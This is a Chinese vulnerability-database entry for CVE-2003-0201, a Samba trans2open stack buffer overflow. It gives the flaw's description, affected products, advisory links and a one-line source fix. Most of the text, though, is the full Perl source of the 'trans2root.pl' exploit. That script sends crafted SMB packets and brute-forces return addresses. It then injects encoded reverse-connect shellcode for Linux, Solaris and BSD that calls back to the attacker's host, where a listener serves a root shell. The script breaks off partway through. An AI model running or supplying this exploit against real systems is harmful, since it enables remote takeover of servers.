CVE-2003-0201
CVSS10.0
发布时间 :2003-05-05 00:00:00
修订时间 :2016-10-17 22:30:33
NMCOEPS    

[原文]Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.


[CNNVD]Samba服务器call_trans2open远程缓冲区溢出漏洞(CNNVD-200305-012)

        
        Samba是一套实现SMB(Server Messages Block)协议,跨平台进行文件共享和打印共享服务的程序。Samba-TNG是一款Samba的衍生版本。
        Samba程序由于对外部输入缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞以root用户权限在系统上执行任意指令。
        问题是smbd/trans2.c文件中的call_trans2open()函数调用:
        StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */
        StrnCpy函数使用namelen拷贝pname到fname中,如果变量namelen赋值为strlen(pname)+1,就会发生缓冲区溢出。变量'fname'是_typedef_ pstring类型,是大小为1024字节的字符,如果pname超过1024字节,就可以覆盖堆栈中的敏感地址,精心构建提交数据可能以root用户权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:samba:samba:2.2.0aSamba Samba 2.2.0a
cpe:/o:sun:solaris:9.0::x86
cpe:/o:compaq:tru64:4.0f_pk7_bl18Compaq Tru64 4.0f PK7_BL18
cpe:/o:sun:solaris:7.0::x86
cpe:/a:hp:cifs-9000_server:a.01.08.01HP CIFS_9000 Server A.01.08.01
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:compaq:tru64:5.1_pk5_bl19Compaq Tru64 5.1 PK5_BL19
cpe:/o:compaq:tru64:5.1a_pk1_bl1Compaq Tru64 5.1a PK1_BL1
cpe:/o:compaq:tru64:4.0g_pk3_bl17Compaq Tru64 4.0g PK3_BL17
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:apple:mac_os_x:10.2.3Apple Mac OS X 10.2.3
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:apple:mac_os_x:10.2.2Apple Mac OS X 10.2.2
cpe:/a:samba:samba:2.0.10Samba 2.0.10
cpe:/o:apple:mac_os_x:10.2.1Apple Mac OS X 10.2.1
cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/a:samba:samba:2.2.1aSamba Samba 2.2.1a
cpe:/o:sun:solaris:2.5.1
cpe:/a:samba-tng:samba-tng:0.3.1Samba-TNG Samba-TNG 0.3.1
cpe:/o:compaq:tru64:4.0d_pk9_bl17Compaq Tru64 4.0d PK9_BL17
cpe:/o:compaq:tru64:5.0a_pk3_bl17Compaq Tru64 5.0a PK3_BL17
cpe:/a:hp:cifs-9000_server:a.01.08HP CIFS_9000 Server A.01.08
cpe:/a:hp:cifs-9000_server:a.01.05HP CIFS_9000 Server A.01.05
cpe:/o:compaq:tru64:5.0fCompaq Tru64 5.0f
cpe:/a:hp:cifs-9000_server:a.01.07HP CIFS_9000 Server A.01.07
cpe:/o:compaq:tru64:5.0aCompaq Tru64 5.0a
cpe:/a:hp:cifs-9000_server:a.01.06HP CIFS_9000 Server A.01.06
cpe:/o:sun:solaris:9.0::sparc
cpe:/a:samba:samba:2.2.8Samba 2.2.8
cpe:/o:compaq:tru64:4.0f_pk6_bl17Compaq Tru64 4.0f PK6_BL17
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/o:hp:hp-ux:11.20HP-UX 11i v1.5
cpe:/a:hp:cifs-9000_server:a.01.09HP CIFS_9000 Server A.01.09
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:compaq:tru64:5.1_pk3_bl17Compaq Tru64 5.1 PK3_BL17
cpe:/o:compaq:tru64:4.0fCompaq Tru64 4.0f
cpe:/o:compaq:tru64:4.0gCompaq Tru64 4.0g
cpe:/o:sun:solaris:9.0:x86_update_2
cpe:/a:samba:samba:2.0.3Samba 2.0.3
cpe:/o:compaq:tru64:4.0bCompaq Tru64 4.0b
cpe:/o:compaq:tru64:5.1b_pk1_bl1Compaq Tru64 5.1b PK1_BL1
cpe:/a:samba:samba:2.0.2Samba 2.0.2
cpe:/a:samba:samba:2.2.0Samba 2.2.0
cpe:/o:apple:mac_os_x:10.2Apple Mac OS X 10.2
cpe:/a:samba:samba:2.0.5Samba 2.0.5
cpe:/o:compaq:tru64:4.0dCompaq Tru64 4.0d
cpe:/o:sun:solaris:7.0
cpe:/a:samba:samba:2.0.4Samba 2.0.4
cpe:/o:compaq:tru64:5.1aCompaq Tru64 5.1a
cpe:/a:samba:samba:2.0.1Samba 2.0.1
cpe:/o:compaq:tru64:5.0_pk4_bl17Compaq Tru64 5.0 PK4_BL17
cpe:/o:compaq:tru64:5.1bCompaq Tru64 5.1b
cpe:/a:samba:samba:2.0.0Samba 2.0.0
cpe:/o:compaq:tru64:5.0_pk4_bl18Compaq Tru64 5.0 PK4_BL18
cpe:/a:samba:samba:2.2.7aSamba Samba 2.2.7a
cpe:/a:samba:samba:2.0.7Samba 2.0.7
cpe:/a:samba:samba:2.2.5Samba 2.2.5
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/a:samba:samba:2.0.6Samba 2.0.6
cpe:/a:samba:samba:2.2.4Samba 2.2.4
cpe:/a:samba:samba:2.0.9Samba 2.0.9
cpe:/a:samba:samba:2.2.7Samba 2.2.7
cpe:/a:samba:samba:2.0.8Samba 2.0.8
cpe:/a:samba:samba:2.2.6Samba 2.2.6
cpe:/o:hp:hp-ux:11.04HP HP-UX 11.04
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01
cpe:/o:compaq:tru64:5.0Compaq Tru64 5.0
cpe:/a:hp:cifs-9000_server:a.01.09.02HP CIFS_9000 Server A.01.09.02
cpe:/o:compaq:tru64:5.1a_pk2_bl2Compaq Tru64 5.1a PK2_BL2
cpe:/o:apple:mac_os_x:10.2.4Apple Mac OS X 10.2.4
cpe:/o:compaq:tru64:5.1_pk6_bl20Compaq Tru64 5.1 PK6_BL20
cpe:/a:samba:samba:2.2.3aSamba Samba 2.2.3a
cpe:/a:hp:cifs-9000_server:a.01.09.01HP CIFS_9000 Server A.01.09.01
cpe:/o:compaq:tru64:5.1Compaq Tru64 5.1
cpe:/o:compaq:tru64:5.1a_pk3_bl3Compaq Tru64 5.1a PK3_BL3
cpe:/o:compaq:tru64:5.1_pk4_bl18Compaq Tru64 5.1 PK4_BL18
cpe:/a:samba-tng:samba-tng:0.3Samba-TNG Samba-TNG 0.3
cpe:/o:hp:hp-ux:11.00HP-UX 11.00

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:567BO in Samba call_trans2open Function
oval:org.mitre.oval:def:2163Samba call_trans2open() Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0201
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0201
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-012
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20030403-01-P
(UNKNOWN)  SGI  20030403-01-P
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000624
(UNKNOWN)  CONECTIVA  CLA-2003:624
http://marc.info/?l=bugtraq&m=104972664226781&w=2
(UNKNOWN)  BUGTRAQ  20030407 [DDI-1013] Buffer Overflow in Samba allows remote root compromise
http://marc.info/?l=bugtraq&m=104974612519064&w=2
(UNKNOWN)  BUGTRAQ  20030407 Immunix Secured OS 7+ samba update
http://marc.info/?l=bugtraq&m=104981682014565&w=2
(UNKNOWN)  BUGTRAQ  20030408 [Sorcerer-spells] SAMBA--SORCERER2003-04-08
http://marc.info/?l=bugtraq&m=104994564212488&w=2
(UNKNOWN)  BUGTRAQ  20030409 GLSA: samba (200304-02)
http://www.debian.org/security/2003/dsa-280
(VENDOR_ADVISORY)  DEBIAN  DSA-280
http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
(UNKNOWN)  MISC  http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
http://www.kb.cert.org/vuls/id/267873
(UNKNOWN)  CERT-VN  VU#267873
http://www.mandriva.com/security/advisories?name=MDKSA-2003:044
(UNKNOWN)  MANDRAKE  MDKSA-2003:044
http://www.novell.com/linux/security/advisories/2003_025_samba.html
(UNKNOWN)  SUSE  SuSE-SA:2003:025
http://www.redhat.com/support/errata/RHSA-2003-137.html
(UNKNOWN)  REDHAT  RHSA-2003:137
http://www.securityfocus.com/bid/7294
(VENDOR_ADVISORY)  BID  7294

- 漏洞信息

Samba服务器call_trans2open远程缓冲区溢出漏洞
危急 边界条件错误
2003-05-05 00:00:00 2005-10-20 00:00:00
远程  
        
        Samba是一套实现SMB(Server Messages Block)协议,跨平台进行文件共享和打印共享服务的程序。Samba-TNG是一款Samba的衍生版本。
        Samba程序由于对外部输入缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞以root用户权限在系统上执行任意指令。
        问题是smbd/trans2.c文件中的call_trans2open()函数调用:
        StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */
        StrnCpy函数使用namelen拷贝pname到fname中,如果变量namelen赋值为strlen(pname)+1,就会发生缓冲区溢出。变量'fname'是_typedef_ pstring类型,是大小为1024字节的字符,如果pname超过1024字节,就可以覆盖堆栈中的敏感地址,精心构建提交数据可能以root用户权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 修改smbd/trans2.c中的250行:
        -StrnCpy(fname,pname,namelen);
        +StrnCpy(fname,pname,MIN(namelen, sizeof(fname)-1));
        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-280-1)以及相应补丁:
        DSA-280-1:New samba packages fix remote root exploit
        链接:
        http://www.debian.org/security/2002/dsa-280

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1.dsc

        Size/MD5 checksum: 682 f6408cc26d6825708b42aee5804346aa
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1.diff.gz

        Size/MD5 checksum: 84907 aa39196e9842b853e2ca6eccb69a67ee
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7.orig.tar.gz

        Size/MD5 checksum: 4276392 b5e61ea655d476072fd0365785fea2d0
        Architecture independent components:
        
        http://security.debian.org/pool/updates/main/s/samba/samba-doc_2.0.7-5.1_all.deb

        Size/MD5 checksum: 1730866 e50fbefba3bdf5abeb136484a19cae19
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 1368434 6f5c06a774c9cdf07fe10d739221644f
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 671138 07967650ed35874384c3cdf6f630f024
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 751518 5ca4feb086cdd75e96a76c45ffed0761
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 464608 1f59a2592e652886f33155f1b177733a
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 303764 9d2f4dc0431453363c1ec61f110ebfd5
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 1128522 3385d1640b33672a960b515a24076f73
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 594892 3b0da8cf9d6baa38be60b20fd40d3e67
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 611464 2d2293eb3af68122af74fce318fe1daf
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 379972 810376b6f2eeb326c8b4077bab9a642d
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 251962 8add539661bb6cf17feeb141179f5e5e
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 1038178 85520066846690baf161dcd1e109e3b4
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 570658 e7cf4ae028c0e629bf5d4ebd4e762840
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 560702 4b15aab22dc0b5d5d43f3094594261dc
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 351374 7baebac78c9f9db2d474d549193b3229
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 233416 521feb878fe8c9d0d145cabc98de136f
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 993334 465a088df279605a161bceb13d3fadc7
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 557152 88a5169cabadefcf300d46dff7009535
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 536528 20e0c945b6b4f26df08a878a93abb260
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 339706 319d3aba8172f071040a192ee40d0fce
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 222556 dbdbac65a0bc736fbed9bcc42c3dabb1
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 1124154 e4624fae9942e547c68fcdbfbb88bb7d
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 594476 7146e39be6c26d868073b608230bd340
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 610070 0e78c52db69ad9b7a52da770e3298878
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 382148 5b5cbb24a03eca3ec9b78ae13d4fa614
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_pow

- 漏洞信息 (7)

Samba 2.2.x Remote Root Buffer Overflow Exploit (EDBID:7)
linux remote
2003-04-07 Verified
139 H D Moore
N/A [点击下载]
#!/usr/bin/perl
###############

##[ Header
#         Name:  trans2root.pl
#      Purpose:  Proof of concept exploit for Samba 2.2.x (trans2open overflow)
#       Author:  H D Moore <hdmoore@digitaldefense.net>
#    Copyright:  Copyright (C) 2003 Digital Defense Inc.
#  trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>
##

use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;

$SIG{USR2} = \&GoAway;

my %args;
my %targets =
(
    "linx86"  => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
    "solx86"  => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
    "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
    # name      # default   # start     # end      # step  # function
);

getopt('t:M:h:p:r:H:P:', \%args);

my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host  = $args{H} || Usage();
my $local_port  = $args{P} || 1981;
my $target_port = $args{p} || 139;

my $target_mode = "brute";

if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_type\n";

# allow single mode via the -M option
if ($args{M} && uc($args{M}) eq "S")
{
    $target_mode = "single";
}

# the parent process listens for an incoming connection
# the child process handles the actual exploitation
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);

# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
$targ_ret = eval($targ_ret);

if ($target_mode !~ /brute|single/)
{
    print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
    exit(0);
}


if ($target_mode eq "single")
{
    $curr_ret = $targ_ret;
    if(! $targ_ret)
    {
       print "[*] Invalid return address specified!\n";
        kill("USR2", $listen_pid);
        exit(0);
    }

    print "[*] Starting single shot mode...\n";
    printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
    my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
    my $ret = AttemptExploit($target_host, $target_port, $buf);

    sleep(2);
    kill("USR2", $listen_pid);
    exit(0);
}


if ($target_mode eq "brute")
{
    print "[*] Starting brute force mode...\n";

    for (
          $curr_ret  =$targets{$target_type}->[1];
          $curr_ret >= $targets{$target_type}->[2];
          $curr_ret -=$targets{$target_type}->[3]
        )
    {
        select(STDOUT); $|++;
        my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
        printf ("                                        \r[*] Return Address: 0x%.8x", $curr_ret);
        my $ret = AttemptExploit($target_host, $target_port, $buf);
    }
    sleep(2);
    kill("USR2", $listen_pid);
    exit(0);
}

sub Usage {

    print STDERR "\n";
    print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
    print STDERR "===================================\n\n";
    print STDERR "    Usage: \n";
    print STDERR "           $0 <options> -t <target type> -H <your ip> -h <target ip>\n";
    print STDERR "  Options:  \n";
    print STDERR "           -M (S|B) <single or brute mode>\n";
    print STDERR "           -r       <return address for single mode>\n";
    print STDERR "           -p       <alternate Samba port>\n";
    print STDERR "           -P       <alternate listener port>\n";
    print STDERR "  Targets:\n";
    foreach my $type (keys(%targets))
    {
        print STDERR "            $type\n";
    }
    print STDERR "\n";


    exit(1);
}


sub StartListener {
    my ($local_port) = @_;
    my $listen_pid = $$;

    my $s = IO::Socket::INET->new (
                Proto => "tcp",
                LocalPort => $local_port,
                Type => SOCK_STREAM,
                Listen => 3,
                ReuseAddr => 1
    );

    if (! $s)
    {
        print "[*] Could not start listener: $!\n";
        exit(0);
    }

    print "[*] Listener started on port $local_port\n";

    my $exploit_pid = fork();
    if ($exploit_pid)
    {
        my $victim;
        $SIG{USR2} = \&GoAway;

        while ($victim = $s->accept())
        {
            kill("USR2", $exploit_pid);
            print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
            StartShell($victim);
        }
        exit(0);
    }
    return ($exploit_pid);
}

sub StartShell {
    my ($client) = @_;
    my $sel = IO::Select->new();

    Unblock(*STDIN);
    Unblock(*STDOUT);
    Unblock($client);

    select($client); $|++;
    select(STDIN);   $|++;
    select(STDOUT);  $|++;

    $sel->add($client);
    $sel->add(*STDIN);

    print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
    print $client "echo \n";

    while (fileno($client))
    {
        my $fd;
        my @fds = $sel->can_read(0.2);

        foreach $fd (@fds)
        {
            my @in = <$fd>;

            if(! scalar(@in)) { next; }

            if (! $fd || ! $client)
            {
                print "[*] Closing connection.\n";
                close($client);
                exit(0);
            }

            if ($fd eq $client)
            {
                print STDOUT join("", @in);
            } else {
                print $client join("", @in);
            }
        }
    }
    close ($client);
}

sub AttemptExploit {
    my ($Host, $Port, $Exploit) = @_;
    my $res;

    my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type
  => SOCK_STREAM, Protocol => "tcp");

    if (! $s)
    {
        print "\n[*] Error: could not connect: $!\n";
        kill("USR2", $listen_pid);
        exit(0);
    }

    select($s); $|++;
    select(STDOUT); $|++;
    Unblock($s);

    my $SetupSession =
        "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
        "\x00\x00\x00\x00";

    my $TreeConnect =
        "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
        "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
        "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
        "\x43\x24";

    my $Flush = ("\x00" x 808);

    print $s $SetupSession;
    $res = ReadResponse($s);

    print $s $TreeConnect;
    $res = ReadResponse($s);

    # uncomment this for diagnostics
    #print "[*] Press Enter to Continue...\n";
    #$res = <STDIN>;

    #print "[*] Sending Exploit Buffer...\n";

    print $s $Exploit;
    print $s $Flush;

    ReadResponse($s);
    close($s);
}

sub CreateBuffer_linx86 {
    my ($Host, $Port, $Return) = @_;

    my $RetAddr =  eval($Return);
    $RetAddr = pack("l", $RetAddr);

    my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
    $a1 = chr(ord($a1) ^ 0x93);
    $a2 = chr(ord($a2) ^ 0x93);
    $a3 = chr(ord($a3) ^ 0x93);
    $a4 = chr(ord($a4) ^ 0x93);

    my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
    $p1 = chr(ord($p1) ^ 0x93);
    $p2 = chr(ord($p2) ^ 0x93);

    my $exploit =
        # trigger the trans2open overflow
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".

        GetNops(772) .

        # xor decoder courtesy of hsj
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
        "\x93\x40\xe2\xfa".

        # reverse-connect, mangled lamagra code + fixes
        "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
        "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
        "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
        $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
        "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
        "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
        "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
        "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
        "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
        "\xfd\xbc\xe0\xfb".

        GetNops(87).

        ($RetAddr x 8).

        "DDI!". ("\x00" x 277);

    return $exploit;
}

sub CreateBuffer_solx86 {
    my ($Host, $Port, $Return) = @_;

    my $RetAddr =  eval($Return);
    my $IckAddr = $RetAddr - 512;

    $RetAddr = pack("l", $RetAddr);
    $IckAddr = pack("l", $IckAddr);

    # IckAddr needs to point to a writable piece of memory

    my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
    $a1 = chr(ord($a1) ^ 0x93);
    $a2 = chr(ord($a2) ^ 0x93);
    $a3 = chr(ord($a3) ^ 0x93);
    $a4 = chr(ord($a4) ^ 0x93);

    my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
    $p1 = chr(ord($p1) ^ 0x93);
    $p2 = chr(ord($p2) ^ 0x93);

    my $exploit =
        # trigger the trans2open overflow
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".

        GetNops(813) .

        # xor decoder courtesy of hsj
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
        "\x93\x40\xe2\xfa".

        # reverse-connect, code by bighawk
        "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
        "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
        $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
        "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
        "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
        "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
        "\x6c\x46".

        GetNops(87) .

        "010101".
        $RetAddr.
        $IckAddr.
        $RetAddr.
        $IckAddr.
        "101010".

        "DDI!". ("\x00" x 277);

    return $exploit;
}

sub CreateBuffer_bsdx86 {
    my ($Host, $Port, $Return) = @_;

    my $RetAddr =  eval($Return);
    my $IckAddr = $RetAddr - 512;

    $RetAddr = pack("l", $RetAddr);
    $IckAddr = pack("l", $IckAddr);

    # IckAddr needs to point to a writable piece of memory

    my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
    $a1 = chr(ord($a1) ^ 0x93);
    $a2 = chr(ord($a2) ^ 0x93);
    $a3 = chr(ord($a3) ^ 0x93);
    $a4 = chr(ord($a4) ^ 0x93);

    my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
    $p1 = chr(ord($p1) ^ 0x93);
    $p2 = chr(ord($p2) ^ 0x93);

    my $exploit =
        # trigger the trans2open overflow
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".

        GetNops(830) .

        # xor decoder courtesy of hsj
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
        "\x93\x40\xe2\xfa".

        # reverse-connect, code by bighawk
        "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
        "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
        "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
        "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
        "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".

        GetNops(87) .

        "010101".
        $RetAddr.
        $IckAddr.
        $RetAddr.
        $IckAddr.
        "101010".

        "DDI!". ("\x00" x 277);

    return $exploit;
}

sub Unblock {
        my $fd = shift;
        my $flags;
        $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
        fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}

sub GoAway {
    exit(0);
}

sub ReadResponse {
    my ($s) = @_;
